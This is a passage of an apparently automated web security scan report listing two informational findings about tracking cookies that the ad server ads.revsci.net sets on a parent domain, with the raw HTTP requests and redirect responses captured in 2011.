6jRXHD0nkXRlRjiWS6ey6ODk7jWoiqPWwr+x2FHdnLpzowfuBuaZPFbrr5//T+tJPg0eKuCLr3R4K6PTUqHpej1AArZPQTL6FLqPQT4jVC3KzTCEGa4CaAnHY0Zrqs3d5iDVBUqwlTDxNfC7Ga9LeLy7/TcjcspKJyoaFh/2WC0jsAA3fEz6gj7U8mHA9cZFqj1IA6CoHNofMMWxvZ1EP/MiaMCqu1NxvqRz/nXou9NXXRguDHgUMu+z/yqY7XVxJWePCdb1p/q0Ew6qECQtyV6d8GNEFQloez/xBOOBcaKVasrabhh1mQhT1NABEEl0kGwHC9WuwvD8k5Ecm2g8Ub+8b8xWwawUkMxMLByw5fcEsO9lfN6yIXoK1vxbj/pN0GepXRxh4CCs9Y7SE/BWKnzNyBxrgIJBjNX2fpVDk9Qsy0jVeGn3pOqTP3l4YuJ1ioOHQT1JoRoJIKV4KRQq6Uzfq06fBDaJQf2kAQmgasQb39TGpsoAAZ5fvxckeQEMeOXTASaI1R/+6s3NCrVMLC7QIoUNHB/pGHS/OcquP8g8+avfDQBV+QwQIEjhL6Iy4vOheGZSgcslcOuTo9uMDkQcD4TrVKgsZIcfxEvv59B9klF63vqdAxxVxWmQS/tta5XA0ec/K359cVqOUV61/1Z4ODlvwuT29lxjH3/Y2sHLLMADwAXCR12/hlj15BfplbSqflcwddB3qetl5l4Zp7Z85bCzMG3I2xqoeKfJnKV+bExcZUxDS3oaeHUpFHUs4N5ehhFRt110WtEiM3U8HX32Gj4Hp80Y48x4dEhHIyopb6KyUupuEWF0HYN10tmN/yOvbv3JznYqmx7xBf5dbh1P1aFX/I703GMAJL4bJnpHiTF000ztP6EaHxQuNUeUotUExw=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_0QhP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0QhP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_jPps="MLsXsqMOpihv55B02uKkL0HO5VhPzFub41aKFXpRHFKdvPVwgHpc3W11TIR9f7LUD8Z73T83DyValfM1h7J8utf6T18BDyINqjFgUEBviB6wC3AmWRNvWmnhfgaSeSZbfIrh7v64ZWvKAjggMcZyrZ6vLc5qcjwCmL/0oZDP8YqLmKgPs4HYfVYtn46L1mXZM3vmhkqnN+Y0MpSVXqd0hbyM0SkE0D5Ds/W9iWGY7E1bUBILVyFK1/4+5eQfTiEqVlK8a/qM623WsUprwKcRuTC/2etNmMwZUmXLXL4l5tca9Cn0O15iV7KhtDVxnKAQe5YNpUihiZDCPMDCjBAivzUCewOSemVObPoFVOCM+QRn3bFQM5K42ApulVa4YVkXmSEi2rxaZ0AcwbltnrcFCac35jMSgd1X7kaUp4yDfxGV0/R+mLVaE46FkFB1KTnpLFkdV/tmPy4KErU5U7EhTepv7vNH9qtg2M0xH+DdG+tn8ISmbZbHOkanvNyNORkG0QUm2xiMICao0BBWZFo29FuH7dr0oO+iPBWl6DT2bXtmllqG9tO/p8j3jGuVtEgbIz3AlFWF2m7taYagUkBA3j1GrLDNohKBnyu5uUyPqBkfixqcpoKir0d2SBMj/OM4rORxiB7Uo65PjewHtKukTWTmQSsLj3Acbifsgi9wbL9zVVJGVgIcTXgoG/jqS05yhmfmKX8qCC0CYRRR177I88ywSaF/r7vWGjXiHHwgZ47gJ3DOQoL+DikEX0gGF3xIo8a3i2sMLQZqr2JWFzHyCCJzJmgRdhU3AEqEsSjelRGLyl/ooetx8tRA3NaApDAXyoWqc0A3eKQcLroe29E7oHp1C3oFrGgueanXYuyosXNnC+zOt62UwZW1dW3ykOxkph1oSo3iii/Lo/oUqcOQoR4Nz/dQODQww9cCLwiSYZzCMlFy0yoDyptVJ/MC31DDwF9TyHRraYHFjeiyR8N/quDWNiW56K5qS0X8vyfqZr4bgRSRGGDsiel1pymr8ak2dHW/7pgCh2Z/bNJb+FRWMW2s+CMnhwaIGgWvV6YbMPlgl9YohbQyhh/b2JbZAvwaQIxESblZqlOfGdoxG9kGmC3uUwSr"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMlIz9DOAYU1O2W4w59FbognrBvtURlrGeqPrw1kUWtYjd1uFDOZEIsCPLKkgHrmZwPR6snD/KegWZuh0FutTbw4F4xDSARkVDg/8IGrnCXyIubmHi7UglSELqYaAldXTjuMoZfdXjks77agiI8F7p4zhNhDEVuBf4g4YTRwgml0KGCNKuVDbFr44LI4RMOMXIpHjh703eskw3akIyy2OTdbNU3eH8nqE1NY09pwLwNWdkpj4QYCsaCS9peWNuRSFgNI4ESkYvqemBGYCC2pArs+myhno3ulSGalh7j4p8xdlCpnaB3m4Mg5Mw0AxlhyFHR14KBwj3liP/7CiMXvvg0420tUs8MR8cExmuoBAB3Q7hDdd95k3RQsEz5Kv9HaZfEFaJzEM7O9S1Xq2XmxGPNFRWP87+NfYBvqskp8sRzGyF3UtWzyjkPsNjmCm5h+7z0dHxie7b0c3aF5Zfw0ba7gaf9h0b68ZQq1YVnL2lSdUOX2JAKr+Lx6CtXZsqHOC7RZn2zAbkDdEwubDgzL0J5lRWYyyGPyFOlENIeVHT22U1cS2bUxO+Dyj7i90ZxfJaU+2TqDYzmo9dtyimA40OFM5XBEQ7vqEEFOzyDeCC714RzQCBRoxs/m/RS2e5ILHFPZZTEHYoZwM4ObeUmFCSiNstH9MrCk6CZJADpgFYXhjJbUAaCQQ7Yi2oMJ/D46VTxxw5eBy+yxYFS+A3EMKZJ5mxYFGg2rrBwfm05mBKjQYrQnpZfTKbqypewg9N4oxP1vCOYadfieNtqOBTLDzh0Lhd4sC3dYdv3UqPlldEEVGtnbrtbE7YsnOwCttA7ukHTH/Tt0JyRbAcJ72Egr9Nx3T22zsPrgaz+rq6BwPivgjWt9tzBx2GSlQx21WXgOMV2BOrwljqSqGvO9nJOL66/iP6Q27HdhFVcFaRzHtZUxVFvivEPBZuSLAwufljgBbQWYqnWUAtPGF7swsmufHZ2tOiNJTFvp1jvJTg3sICB0j/+CgESrkpzer1FmZ46IiuffFCkZooi4QQResLeLgwl8/ZCW60eHxyNcBv/fbUiAqZxLdJZ8sLQSsEznm1mNFopaoNZXKr6t68NrdbSN+bQ0FKULDalbcOsBsGd3oZjWwcXTussLQi+eZW9RpI0KZnhQD23eEy/9zaqlaw0o4uj3c+tdWjgy6APjlr+AjmAgDZuvsNxfLncHQqNcCbO6b4X2zHjYRg1r9QMev95WYasJ+VSxF4HkN3SyOBOeqDlNvG0CQTh3zFLBiOqhlIrL+XM32dbxI1Oe/uJ1D8sjgPDn+6+LE8esQ1NS+lYa7s8QxAqe/a7NxCrYw4wsoc/amLejCG1zImYIDwkACAl4M72NHaqS/RJ/QUhrEPjyoR344q3inOYzuxoZlHc4xLognW+QiMBxejD2/ZXYPdxsqY5WoqoXyJPxXG5nxr4vM5PMS9TkISyjXkJliU6khgFx09L7IhEVZ5dAypk5DvoKd99s6CJDr0VWN/AZdI3xlhomBupQyvW0nB+ezAypcwqmjOSv6FwLsbwrUtoE8vXOAMsuS2jylwz6UzsKJ/JTQSwUki+"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=987677&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:13:36 GMT

12.16. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=4298BE5B089CBB1E55E7A69A4E062327&rsi_site=BCE6C348CDB3347A37A6E9503B9F4896&rsi_event=3E8A9FCC69C70348C54F8308F5EEBF2B HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF5EOhMHIMN9L9XlOlhjCqMTK6hyRPhgO8/StXBMiwvUtfk2+f8pQBVnH6C1XL1Gj8ORJBPU0K18kquspNa2xO16VkbVFmPmFED/ROfss5MyaTFfhDp+yuExR1/a/IX2Hsyr1RynCW3gOqnFCbXsrgMNvCjwrXqmW2SlkxMp41EdMh9G78sGWNa/7GgZLldatK42V74Yg88W1YkZYf4F9AsRF3ZJU9DT1GHinjto6CMfbUZHldNeJBI6Flkjn2aekrtvERgpwmTyxMruLCaTR9t2E+Hj4dpKoaF4RblayFT/zAnvz2zkNwTna5rE/qk7Q+LphTnobN4Hb4fOsR4xMJVxQOqMgY5elWxPq4MbAA4pr9NcZGvV75dLPsz196Bi/xLxZb8iUPsr91zpM4TgqyjuOtnP0lITIukH4pqFfI4PAuqIffOunVFSOU+KJNu9RTMJv3MjLvRTQKWMJzx4Q+yKHmJCBbAPelw0lKw7E1yBNbQD9fS9KaCUyagBuyoH/dxaWYFEq0KJmG+9Dj0/SQE7msZCu6fHMFzfqi; rtc_M6m_=MLvntzM1ZwprJ5GrFviWjmmgATvNNHGJjojTTrWSZIpIFNkYyjZfNBHlcl0kJ6zHfageWylXbP3wSCPbUS6YYjcsKmrQeOUqyKPcaGszTDTzIh7WtzP5n4+zmZZfmgT5lRj+VfPH65chCW295PBHTclwaYvz/SFH1bidheEC6ZRKt9SG9BW8wwNKY4bJJbonQFHtMUTJpFcuSZbz7kTJnxMUL5KgBaHzjRvnrX6SnFrrchfIM5yjshfapwcb2sNQzbZdjBfasru/cAyP1weNriyPKHNATEhqm48Frl0iQ58XID97HW4ZuelkytTr1rC/Y44WWirvX1n4YT+DONi0LYUryUMomW7rJigm4wWq4rIRbkjgSHhZCCWRyQUFwJAV1ID5hI+aJ6aazd6dtbfN39bi3YdtOqXFXtQA1oZ823p8bU8+95SiLREbVMj4r9fvguEqsb6ZiowiD0QHBR5O7YoGrQTtvt49OFBNALY6xCbDvCZRxcd3PwMbMHF9NmAkKTYba8V7HuVRswXCU8FcQcP/VnsVvebZKb0EM1g01x05ERxj/PWvJb23XMUlVENuV3UxjP7/ReTP933hW1beZhIpumclGw06TmVZf/liRMOjCGGidIRNLkCjxr+jn98gJ60DuWa/6oljSYreAox5hf34+wFu4UMrGRoDMmJA7LZ+pzg7HZsRUu2MzWjCkj/8ilLGHSmlL5arTBlslp16GZkGUbdCuQOVlFSnlI9osJ7qHROvOJZhg2kYof7dNriymTDR4d+g5uaoD9DKAtFuCds/Rc7xVtfeQw4QMbnaY4JllnOKqLPOynBZckcstz/Rie4b4P4ftC2ihuu+hh+tb4xtHsHXUPc4S4kcgMoYU6nDhAG17oc8hRuW5vnXQ8mjCFlmg1AikueTXuw9zaFzxcX2n/5AY6b/9CvUk2jTwvfrs1Zd70/ybVtROyX11nYzYcRFBDcu6y63yS0FvWxXhj23zJyQBUyORdmr8TZe9HKLARFqrE0WgqHy3o4bQOGiuinjnlQO6/Tb6EQqtbqScAcGbOoTuOrGyyrrkhQRvhGP5TddNjuCbLxdI6ExyfhSWnMD5gI9RRANVnvfKpeszlgkjMhHO+AI0RAg1Rnrb694FmmSVopIgyGRfYWjkynQNgJu2WFcRVxyqXdKIg1ngWoCjEvDaqGOV5o+mwsP0WqnIOmypaPth6VviROUBdBqnTYbQpKrGdRSH3Wfsh+/t6tYtduD74mjx0Xqm2pq08w5QcKeM1WKgDKkMJ+XdzqfOAnZd82pKBjE4ORwnukNbnOu7MSSwsL9SL6E1m6fnHLOzNMuGy01wnCq/XskooIWiGeIa++XVGFfQXf7PDHd/Ucx2loESlP3R+oaCchKLj4LZFp4NtIXHvyjIXyP99iHRNx2gZf2aM8ryFP+bp9W3EenSlOtdlCd6kjeE5ZKlRwWat6Qd7j1HhdXSiPKFMAZC/MR350YkTLr27YH04gcO6l0Dkc6qJlOHZIyA2wZYJbumg0oQqkm5O5bX8SVTYKyLJBZj57fPCUUFQ==; rsiPus_nlnh="MLsXrqMOLjproBAxuuKo7xC/v0lmTlecDqSiToO8phWAnpO+YSTKFqU3TDxxVRk18Y3VCTjL0ah6bV8hWqwKPejoJrdpYW+maSaE+SE+JYHAqw/wQUT1qX7wDv68KC/ogKITsb9dC8gdu0uA7sN+LTYfo6fDEvy97fr0sfCIWg/dl5X5uzDg9KOQN8uVmwRirSVhkHVm0KyQbnTUGsc2ZQvcAhR0xzocc/zo82+gM1RCIH+HSCGErtUUZc9RJCGEmtyJa50VtG6uhU13oDsoWTBcH+pKwA+EFmS5nr9l5tca9Gn0G15id7IFw3BzD4Tvch7eJWmhiUjCLEDfLl0gbdj+ckvbdlfP3VayclAOz29lDjEAIM7evWDsxAp95So743zgvTRtdCe4oiCVigVSbNlYtf2gls9w4/Rbe+tmpqScTnQCnaNQwIizICQvruNgmFH/6+lojkVGlNDz5Ky3rTgx4Lb7FGgQFqtNmVDkIrLBzE5vX3eGdFDbFFVsTp88ZqFbUCErpL3v70oO0vaq8n4dLXBDnlJvcS6JdnjRk9xkIe69ZW1oeNhnpjXeiCaYl4LhoNHPSyKqNQcopy21Lq6Fx65Ehc1L/Zo9a+T+ilMYjIAgks58mh41keirnpuezj6yRhV7JX2rrCEqT/hJNxX7y2JcARkB1nMRRB8Zj9SHmrYZ638tSYG3b90lhgWBLXv0LDarrDfBS1eszRzd+qY471tll+fm92jvMhKTIDlOLkVopd2x+0aEKBYWNNN3k3toyRwrKsE4hBORWYMZSTdPaYPOQ1UPnovWcZpohcny7FCN8FH6hqZu6WJ0bE7KXD9+iEBSpnGNcjuJ57gNCQUER3dnilXxUU035Ub31YKYngAcRd67M4oL+VtrIgTE1ftBWaJU5hTHGEe4Nz2Zci3y3xXI6G85vV5OQZPwMjZ5we4k3N9bf3L5Db5oz9FeCksBpZVkBjxTqBRYGfoO/jdzHDYmpioDH7T49AzUBkFAhbVGacpYyYl5p0wOriiZcw3ZFQoSD4yzLpEu3nFozzx0"; rsi_us_1000000="pUMlIz9DOAYU1O2WA3Nf1wgg9Tpj7P+Tw3jzv8rD7yvDmvWDQ0Y8a5KAq8B98fA1QmRNDddtH/dK+uIMHXn850oVpZ6hBQpRqWE9VPS5Xy7XGW2RoRccmRQldIeS8HXSTpZFxGDjrLBA6xGO31q5lEKg7q/Zqa3Eh3raYFPi2iq2P/WUJ8LzKuLWOFTjNfjCk/0VNg4UoWYInFurSNSQ+aUh/C47rdGNAf1Dg1oVK6qn87HdFN4KIp8qp25VM4TSqlPz6cg1zQD2GwFFfzhKwHp0kGxTZK6jX8ZnXISB8sXcy0D55JrXRUETl0uoI4QVbKEZF/5dx1gs9ptsf6SthAIG43IlegqXwtMLrqqpTk/JyFQ2StgdP9FYuRHDpLz+OHzUQh1vrm5xKjX3+Q640exxVIfbO5itfUNxo5BZqgcjww3GikxnYg5fSYMvW08WJalwrMzbnGLl0KXXJ46jOVLE0Rb0yvlFoNktRzKMye9waAvctfzuH9EHwibUfXt190PEJ4A+Sg0AcAp7kOwVeDkiN2MCb3r1WPXuHm3y8pbsO2binEZAAOMbMCz6CtX91Rgn2EzUAx81QjGglnztOuUFRFlI7kjMQeXLGKWBRZdSe6eYTB6Lnh18LdQ5agXYqBlP5eTr0pdews3C7wuHkSy+cjD2XlZOYEMXQn9PuBTSjNA/XlMSRQqc9WomgO0U1VW9Z7NS9+gZx4/DR1GwAkIBjPHU5AlJIaaxmJASLwvjIxrX5KW3zZGf/mjfA2cFyChzAGmctIpu+Vd7ARiWWqAIi6cgvytaV2BRdBlrXFkhSMrlmfawqiVLWJ+RfqZK7gaVrut3WnrJOVMXXqr7CtxUK6a2Pn/1EfyMPFJStSe6uI0JDgJOOUXIh0/QlT3bEiUUzklRDfiLQQg9qZceXx0I0CFus/5FTGi3aSsJ/iOmQ7U7lJyS2obs9TpltQ/ufeib9k1qvREJYFLBR0z5bFhcp5yzXQbaEFx8ymNOXnS1itZUINjWC8jdy5PsuUT+JDJXPtf/HEu1N4a99erdLdqPuj+ki8RVgjGf1QVPdRYQN5Ikpkk0MRA5SSlsc87Euf+syX6f0SaGqcOA+LMY28by9BOfF4CjwojIYLQA7CTMmShGLD7QIoYNPB9pH3S/WcquP8g8yavfDQBU+QwcMOiGx/GukIS2j/H4BDvCbywCrbiyLf0IsbRg+/vZyQlnl03yTrzUhfJGYADGtKLHujYIlWVJ2juevHA9vZrI2f0zNZZFT5Ox5BJBvBcQLenCuVaRyx9ZwQYz5yUzskZStzZiHbYlVsH1sWxuxzg1xSosd3Tq17MFdy1sDZD30OeKip7ei44DiArBocEjjeNpiyKtXSdt7rrwtwl36hGrMTrfhX6+/bn0kr2hGgVBE+oKtf3pVCXZqMHah6gq1RieAs/KWLv+Kc38x5h3OOZj9/KY5a5+y4Drg4l7b9rJsCgZP8zktKSaeNFEIDZ35+CtVymuq0xkEBJifIs="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nlnh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nlnh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5yqb="MLsXsqMOpihv55B02uKkL0HO5VhPzFub41aKFXpRHFKdvPVwgHpcSac2bwmsNhkdOEXqxvwFSW0PWuIiuf5vs4d/6+1JgnwJcXAye6BX2SmCUk2lyWHGHWX6t+hWom64sR6QCUsH8fOAPKnmos20FVMfdpaydAA0jtuMJVCZmMqvF1ncAsC7/5yE16uWBOKTCdSOSW/ZXVfhIGu3WrJm0tDqVeChoIxhy/xde4XyUmuSB9/7elAOBQRzO56McFiZihUiF7BWM4k42yn4D48KIkzxAjOp/q2matzfChpoWJoJQmAa/FD3cElkNWyDUqdAsrGcFX+B+80urqtvlG9QCLJQss7+1Vy3PpP0c1c3tnuVD8M1oK8r+GxztRVhhY3hf3DQqwdIddaV9SmdP8yl7gi/5hDgptfjDbSZhYY5FofU5WnKGlDvIflUESYvL+Jk2IV2UWopb/8BtN5P8y2PP2m6oEArr2CUij4IuY0O/HM5mblhmcw8A+Da1Pp3UByCVGdcE5Q7YvzMG11tETqmQImCxr+/d5prcM77XPpge/PPE4mwmqL0XETLf4K8AxUjzv/bE4a4Obl10/RcZE24AgjgtXJBV0AO3PwhuR7TVsydO5eFgvAU5z5QjEyTjn9OFkdeAxzU5KadN+7VcPs3TlnMKwrkOrSkBpjMGFjlL10HEg2b/LCw4KPED0fRTQrd2WP1MkhLDSPHKPlkk6C6ezxC3cSzy1t89oKC3Wk/cmt9qzfmyDU2tVei/q9pelIv1na6MUe6ek4mRDi5N1USLvECNTY2J0V7UHUKBI7/IJjSI8PbH+Xut2rj01GP1MGgOADXibtpCWQg7AdmpnXByT7seDoRNRD/KTU2tZh3v+mMMk4Lq7VCo5gwnJwZbMGxY0zeghpSZso97WZ72o+rL0/OdbUABSZYz94jFuvgOKVgyhBRNmUs4PZ6Lb+tTobehLL3sgUsZEthxCA3f50jrnKkb4zR6bpLUjdtShIAaU53tI42270YQmbrbcrr/aRPfKVSz9Vwk97mZtB92AzYIAiARXdq9cD2tzWwrPAOtLZVd0DGZy0DCYAjvwwIl1mI3sc4MAgxgCZgM7+5AZ+Tib+6kLO1TLQ="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMlIz9DOAYU1O2Wc/EoGVYZpEdtFa0wkO3LcjYdMedG/503vY5t8QC5qXOSo49tlyo/SaXH5wQBQZoGx8vtub+wYEktHO6BM//uLrdNXC73GW2RoRccmRRxz8iNhj4BKt+Y1QbBr3hgo7XOn3j5NZwUH6cpGC/PhQP2yc3oMfwqw4P2G8L/1MLWiPQkNLjS6Q0ULgZUseZorMWeIlvn6tAf+I16Wc7DPgWwgxsVI+qfMtmvXhiXCCZxxHkTzrS2Qx9wJGinCc3C6IbEK6L+bOM/d0zvNcSiV/bnXGaM0oXMywF54yMGDQbgxlX6KiaXi5cecO3tNy2uyZvsphzHiMKU415xoLFWR5vIUqqtZ3p0I7MdNQAymt+azR1IgoeyLFHonQV/rmbDVyBrQ7w/ZU1q3kPLNZqCoV19V8Ng3RcmgDNs2ztcqJiJ2FYpYHHLExFXt/kMkEKU12WDAShkamQ4oh7wVtvb3SIZvhlglQ4XK1myJJ70E2cGE993JVtFB4ZSDzI5mD1ULHX5ipqiAWCc57KD4ahZqh2uhYR03AikbGwMyjC9INZnFYCGISKHvOyJMMCqXuslvb0LOqdL1CNF73QC3mlmmAsFkg/Z1N0Lcju2xYkR/w04GSY87iblMN4vGedpKxyOty8WBEY5zR3PoeJAPW813IlvGKI+vrtPOnhXkDl5GFfXyOuzVksBDR0aU4odjaj9Ydllfjz9gXcpchwizlcc8yJtNAoSVT5blL4wWQnXBp1X4EqMI7rXbc2BxYFveNmgFDHak3Uv1aahWQUTA37C+/jHID6QBEXvvXL38cgHFdC0+wVBE1/bEJPHD7RgiMULCYDRnuBB7vb4bw8EkraqsFwTCQuECl9FE+xV5gwdL+Zs43PrB8Wbzo32CFjasjNqoLC4uGfrDe3/4eIPomh2R7O0wqTgfeQqm7U7MZWjGEQax9tHfZ9cjVmQ2luC27SJVuBpsVgTENVuoPj9sPHfqlx1OKzRXsxBXVNMuNB8zsGaobxo3NEaQgb7bxzMy2YaItXeP1SshknEbvQGIG4gNeqfOi/f7owgltGCxoApuUOYoQo/GRHlyUtX7dJav8HzMCoSk8O/hBCdS2FWBCkjLh7ZHlOb5iwL5/G417cICEUUFpp0bAIolhPhljmnqXaeGGY4TATTuQd2sr2shKgIr9MeXfVXfK40jfgXLDr0cBPoR5w9pbOynqLgwtjdFtf9K0Tco2eQSbv3Sgx1M83lReyDnC4n4v2FIK8kb1JyDlcPIVSllALhBZa00InWMpvYzctsjkNfujaODeQ7HB4rHCcl3yKE4UR5iHJH6uF4QRvCiaEM7wK91IOM7w2RPnXJnsR3YNyLRd4ZB2HJPpFnqTEi/5U+fnusYeCe5OxMsM54Lrvi9prlub16W1NfBaKhZjCDJtb9MgIIHzFj7bkX2/w7hpvWSvyy5VBHJrbpjHQ76isdLqMJ9Whj7/Rb+y0+VUxwk2q++4qHdrARV+JAkDbTDpleLUYiMgukHEmKgP3o6ijg5npUPykZ+K/RHXzZWBsOQLYEXSb//xDOXa7h7odolJp7vXr+/5s="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=987677&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:15:43 GMT

12.17. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&type=gif&csid=K10145 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305608&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
